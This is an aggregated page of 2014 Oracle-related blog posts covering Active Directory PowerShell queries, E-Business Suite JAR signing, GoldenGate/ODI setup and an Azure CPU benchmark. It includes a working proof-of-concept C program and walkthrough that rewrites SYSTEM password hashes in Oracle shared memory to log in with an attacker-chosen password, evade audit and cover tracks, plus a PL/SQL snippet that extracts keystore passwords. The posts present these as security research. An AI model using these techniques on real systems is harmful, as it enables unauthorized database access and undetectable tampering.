Skip navigation.

Feed aggregator

powershell goodies for Active Directory

Laurent Schneider - Fri, 2014-07-11 07:04

What are my groups?


PS> Get-ADPrincipalGroupMembership lsc |
      select -ExpandProperty "name"
Domain Users
oracle
sybase

Who is a member of that group?

PS> Get-ADGroupMember oracle| 
      select -ExpandProperty "name"
Laurent Schneider
Alfred E. Newmann
Scott Tiger

What is my phone number?

PS> (get-aduser lsc -property MobilePhone).MobilePhone
+41 792134020

This works like a charm on your Windows 7 PC.
1) Download and install Remote Server Administration Tools
2) Activate the Windows feature “Active Directory Module for Powershell” under Control Panel > Programs
3) PS> Import-Module ActiveDirectory
Read the procedure here: how to add active directory module in powershell in windows 7
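
The same module can also write attributes back, permissions permitting. A minimal sketch to update the mobile number read above (Set-ADUser and its -MobilePhone parameter ship in the same ActiveDirectory module; the number shown is illustrative):

PS> Set-ADUser lsc -MobilePhone "+41 791234567"
PS> (get-aduser lsc -property MobilePhone).MobilePhone
+41 791234567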

Oracle E-Business Suite Security - Signed JAR Files - What Should You Do – Part II

In our blog post on 16-May, we provided guidance on Java JAR signing for the E-Business Suite. We are continuing our research on E-Business Suite Java JAR signing and will present it in a forthcoming educational webinar. Until then, we would like to share a few items of importance based on recent client conversations -

  • Apply latest patches - The latest patches for Oracle E-Business Suite JAR signing are noted in 1591073.1. There are separate patches for 11i, 12.0.x, 12.1.x and 12.2.x. To fully take advantage of the security features provided by signing JAR files the latest patches need to be applied.
  • Do not use the default Keystore passwords - Before you sign your JAR files change the keystore passwords.  The initial instructions in 1591073.1 note that a possible first step before you start the JAR signing process is to change the keystore passwords. Integrigy recommends that changing the keystore passwords should be mandatory. The default Oracle passwords should not be used. Follow the instructions in Appendix A of 1591073.1 to change both keystore passwords. Each password must be at least six (6) characters in length. If you have already signed your JAR files, after changing the keystore passwords you must create a new keystore and redo all the steps in 1591073.1 to create a new signed certificate (it is much easier to change the keystore passwords BEFORE you sign your JAR files).
  • The keystore passwords are available to anyone with the APPS password - Using the code below, anyone with the APPS password can extract the keystore passwords. Ensure that this fact is allowed for in your policies for segregation of duties, keystore management and certificate security.

SQL> set serveroutput on
declare 
spass varchar2(30); 
kpass varchar2(30); 
begin 
ad_jar.get_jripasswords(spass, kpass); 
dbms_output.put_line(spass); 
dbms_output.put_line(kpass); 
end; 
/

This will output the passwords in the following order:

store password (spass) 
key password (kpass)

If you have questions, please contact us at info@integrigy.com

Tags: Security Strategy and Standards, Oracle E-Business Suite
Categories: APPS Blogs, Security Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically, we updated the password hashes in the SGA to known values for user SYSTEM using the following 3 commands (one for the PASSWORD column hash, and one each for the S: and H: components of SPARE4, as seen in the user$ queries below) :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in the SGA were updated, that the database neither crashed nor detected the data change, and that it allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record, and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back out the changes made to the SGA, restoring the original hash values, to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof-of-concept program to change data in Oracle shared memory mapped to /dev/shm.
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it. I have tested it on Linux against Oracle 12c databases, changing data in the SGA without crashing the database, and it should also work against 11g. It won't work against Oracle versions prior to 11g, as they manage shared memory in a different manner (sample program here).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>      /* O_RDWR for shm_open */
#include <sys/stat.h>   /* fstat and struct stat */
#include <sys/file.h>
#include <sys/mman.h>   /* shm_open and mmap */

void replace_sga(char search_string[], char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        /* stop early enough that the inner comparison never reads
           past the end of the mapped segment */
        for (i = 0; i + search_length <= fileInfo.st_size; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        munmap(data, fileInfo.st_size);  /* unmap before closing */
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in the SGA was changed, and the data on disk remained untouched (verified by flushing the buffer cache and forcing a re-read from disk). The replace program was run after the row was inserted, so the first SELECT below returns the modified value from the SGA, while the re-read from disk after the flush shows the original value.


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

Rittman Mead Consulting - Thu, 2014-07-10 15:26

In this post, the finale of the four-part series “GoldenGate and Oracle Data Integrator – A Perfect Match in 12c”, I’ll walk through the setup of the ODI Models and start journalizing in “online” mode. This will utilize our customized JKM to build the GoldenGate parameter files based on the ODI Metadata and deploy them to both the source and target GoldenGate installation locations. Before I get into all of the details, let’s recap the first 3 posts and see how we arrived at this point.

Part one of the series, Getting Started, led us through a quick review of the Oracle Reference Architecture for Information Management and the tasks we’re trying to accomplish: loading both the Raw Data Reservoir (RDR) and Foundation schemas simultaneously using Oracle GoldenGate 12c replication, and setting it all up via Oracle Data Integrator 12c. We also reviewed the setup of the GoldenGate JAgent process, necessary for communication between ODI and GoldenGate when using the “online” version of the Journalizing Knowledge Module.

In part two, we reviewed the Journalizing Knowledge Module, “JKM Oracle to Oracle Consistent (OGG Online)”, its new features, and how much it has been improved in ODI 12c. Full integration with Oracle GoldenGate, through the use of the new ODI Tool “OdiOggCommand”, allows for the setup and configuration of GoldenGate process groups, trail file directories, and table-level supplemental logging, all from the ODI JKM.

Most recently, part 3, titled Setup Journalizing, walked us through the customizations of the “JKM Oracle to Oracle Consistent (OGG Online)” that will allow us to create the source-to-foundation replication alongside the standard source-to-RDR setup. We added a set of options: the first to control whether or not we replicate to foundation, and the second to capture the ODI Logical Schema corresponding to the foundation schema. Then we added the task that will create the source-to-foundation table mapping inside the GoldenGate replicat parameter file, and set the options appropriately. I’ve been using the ODI 12c Getting Started VM, with the 12.1.2 version of ODI, for my demo setup. If you haven’t done so already, you can download the latest version of the VM, with ODI 12.1.3, from the Oracle Technology Network. That’s enough recap; now on to the final steps for GoldenGate and ODI 12c integration. Let’s start journalizing!

Setup ODI Models

Create Models

We first need to create the ODI Models and Datastores for the Source, Staging (Raw Data Reservoir) and Foundation tables. I will typically reverse engineer the source tables into a Model first, then copy them to the Staging and Foundation Models. This approach will ensure the column names and data types remain consistent with the source. I then execute a Groovy script to create the additional data warehouse audit columns in each of the Foundation Datastores.


Configure JKM

Unlike the 11g version of ODI, in 12c the “JKM Oracle to Oracle Consistent (OGG Online)” Knowledge Module will be set on the source Model. Open up the Model, in this example, PM_SRC, and switch to the Journalizing tab.


We’ll set the Journalizing Mode to “Consistent Set” and then choose the customized JKM that we have been working with in this example, “JKM Oracle to Oracle Consistent (OGG Online) RM”, from the dropdown list. Now we are presented with the GoldenGate Process Selection parameters and a list of KM Options to configure.

Set the Process Selection parameters for the Capture Process and Delivery Process by selecting the Logical Schemas created in Part 3 - Setup GoldenGate Topology – Schemas. This setting drives the naming of the Extract, Pump, and Replicat parameter files and process groups in GoldenGate. If you plan to use GoldenGate for the initial load, select the processes here as well. I’m not setting mine, as I typically use a batch load tool, such as Oracle Datapump or insert across DBLink to perform the initial load of the target. As you can see in the image below, you can also create the Oracle GoldenGate Logical Schemas from the Model.


Next are the set of Options, including the 2 new Options added in the previous post. We can leave several of the values as the default, as they are specific to particular character sets or implementation on a multi-node Oracle RAC setup.


The Options we do want to set:

ONLINE - Set to “true” to enable the automatic GoldenGate configuration when Start Journal is run.
LOCAL_TEMP_DIR – Enter a directory local to the machine on which the Start Journal process will be executed. Be sure the user executing the Start Journal process has privileges to create/modify/remove directories and files.
APPLY_FOUNDATION – Custom Option, set to “true” to enable the addition of the source-to-foundation mapping to the GoldenGate Replicat parameter file.
FND_LSCHEMA – The Logical Schema for the Foundation layer, necessary when APPLY_FOUNDATION is true.

After the Options are set, the Model can be saved and closed. Back in the Designer Navigator, add the Datastores to CDC by either selecting each individual Datastore and adding it or by right-clicking the Model and choosing to add the entire set all at once.


Before we get on with using the JKM, there is one thing I forgot to mention in the previous post. When setting up the Logical Schema for the GoldenGate “Delivery” process, you must also set the target Logical Schema. If you fail to do so, you’ll get an error stating “SnpLSchema does not exist” when attempting any Change Data Capture commands on the source Model.


With the JKM set and the tables added to Change Data Capture, we can now add a Subscriber. Subscribers allow multiple mappings to consume the change data from the J$ tables at different intervals. For example, a table may be consumed by one mapping every hour, and then by an additional mapping each night. Two different Subscribers would be used in this case. In our example, I’ll create a single Subscriber named “PERFECT_MATCH”. Make sure the process runs successfully, then it’s time to start Journalizing.

Start Capturing Changes

With the setup and configuration out of the way, the rest is up to the JKM. We’re now able to right-click the source Model and select Change Data Capture–>Start Journal. This executes all of the Start Journal related steps in the JKM, which will create the CDC Framework (J$ tables, JV$ views, etc.), generate and deploy the GoldenGate parameter files (Extract, Pump, and Replicat), and configure and start the GoldenGate process groups. Be sure that the source and target GoldenGate Manager and JAgent processes are running prior to executing the Start Journal process. Also, make sure that the database is in ArchiveLog mode and ready for GoldenGate to capture transactions.

After the Start Journal process is successfully completed, you can browse to the source GoldenGate home directory, run GGSCI, and view the status of the OGG process groups.


It looks like the Extract and Pump are in place and running. Now let’s check out the Replicat on the target GoldenGate installation.


Here we see that the Replicat process is in place, but not actually running. Remember from our JKM editing that we commented out the step that will start the Replicat process. This is to ensure we perform an initial load prior to applying any captured change data to the target.

The last bit of work that must be completed is the initial load. I won’t go into details here, but the way I like to do it is to load the source to the target data based on a captured SCN using Oracle Datapump or DBLink rather than using GoldenGate process groups to perform the load. Note: The ODI 12c Getting Started Guide doesn’t even use the OGG initial load! Then, we can start the replicat in GoldenGate after the captured SCN using the same approach I wrote about in a previous blog on ODI and GoldenGate 11g.
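
As a sketch, once the initial load completes, the Replicat can be started from that captured SCN in GGSCI (RPMEDWP is the Replicat group generated by the JKM in this example; the CSN value shown is purely illustrative):

start replicat RPMEDWP, aftercsn 6488359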

JKM “Online” Mode

Beyond adding the parameter files and process groups, what exactly did the “online” version of the JKM do for us? If you browse to the directory that we set in the JKM Options under LOCAL_TEMP_DIR, you’ll find all of the GoldenGate files generated by the JKM. These files were generated locally, then uploaded to their proper GoldenGate home directory. Without “online” mode, they would have had to be copied to GoldenGate manually.


Once uploaded, the obey files (batch files for GoldenGate commands) were executed.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTEOBEY" "-OBEY_FILE=/home/oracle/Oracle/Middleware/oggsrc/EXTPMSRC.oby"

And finally, JKM steps were generated to perform the creation of the process groups in GoldenGate.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
add extract EXTPMSRC, tranlog, begin now 
add exttrail /home/oracle/Oracle/Middleware/oggsrc/dirdat/oc, extract EXTPMSRC, megabytes 100
stop extract EXTPMSRC
start extract EXTPMSRC

If you ever need to stop the change data capture process, either to add additional tables or make modifications to the metadata, you can run the Drop Journal process. Not only will the CDC Framework of tables and views be removed, but the “online” mode also reaches into GoldenGate and drops the process groups that were generated by the JKM.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
stop extract RPMEDWP
delete extract RPMEDWP

In conclusion, the integration between GoldenGate and Oracle Data Integrator  in 12c has been vastly improved over the 11g version. The ability to manage the entire setup process from within ODI is a big step forward, and I can only see these two products being further integrated in future releases. If you have any questions or comments about ODI or GoldenGate, or would like some help with your own implementation, feel free to add a comment below or reach out to me at michael.rainey@rittmanmead.com.


Categories: BI & Warehousing

Oracle Priority Service Infogram for 10-JUL-2014

Oracle Infogram - Thu, 2014-07-10 15:09

RDBMS
A Tale of Session Parameter Settings, an oldie but goodie from one of our favorite bloggers, DBA Kevlar.
From the ORACLE-BASE Blog: Invoker Rights in Oracle Database 12c : Some more articles.
In-Memory Option
Oracle In-Memory Option: 6 Key Points, from InformationWeek.
Certification
Upgrade Your OCA Certification to a Current Version of OCP With a Streamlined Path, from Oracle Certification.
SOA
From Oracle SOA Suite Components: Human Workflow.
Top 10 Most Popular OTN SOA Articles, from ArchBeat.
Java
From The Aquarium: Spotlight on GlassFish 4.0.1 : #1 JDBC Realm
Programming
Seven Things You Should Never Code Yourself, from New Relic.
10 Essential Sublime Text Plugins for Full Stack Developers, from Sitepoint.
Hadoop
From the Oracle A-Team Chronicles: Importing Data from SQL databases into Hadoop with Sqoop and Oracle Data Integrator (ODI)
WebLogic
Additional new material WebLogic Community, from the WebLogic Partner Community EMEA blog.
A free eCourse: WebLogic Server 12c (12.1.3) New Features.
OAM
From Pythian: Differences Between R12.1 and R12.2 Integration with OAM.
Coherence
Coherence Adapter Configuration, from Antony Reynolds' Blog.
Business
From Forbes: Why Today's Enterprise Social Strategies Won't Work Tomorrow
From ICS: Simplifying IT to Drive Better Business Outcomes and Improved ROI: Introducing the IT Complexity Index.
EBS
From the Oracle E-Business Suite Support Blog:
Learn About Troubleshooting Reports & Printing Issues
How to Find E-Business Suite & E-Business Suite Technology Stack Patches
HCM: Introducing the 'HCM Person Analyzer' for EBS Human Capital Management
Your Payables #1 Document Keeps Getting Better!!
Webcast: How To Use E-Business Tax Simulator

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. I created a new virtual machine using the “quick create” option with Oracle Linux, choosing a 4-core “A3” standard instance.

I must say I like the machine naming with the built-in “cloudapp.net” DNS that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than on AWS, though no more than a few minutes. And speaking of IP addresses, both of mine start with 191.236, an address block assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry due to the shortage of North American IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a row:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 MB/s.

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
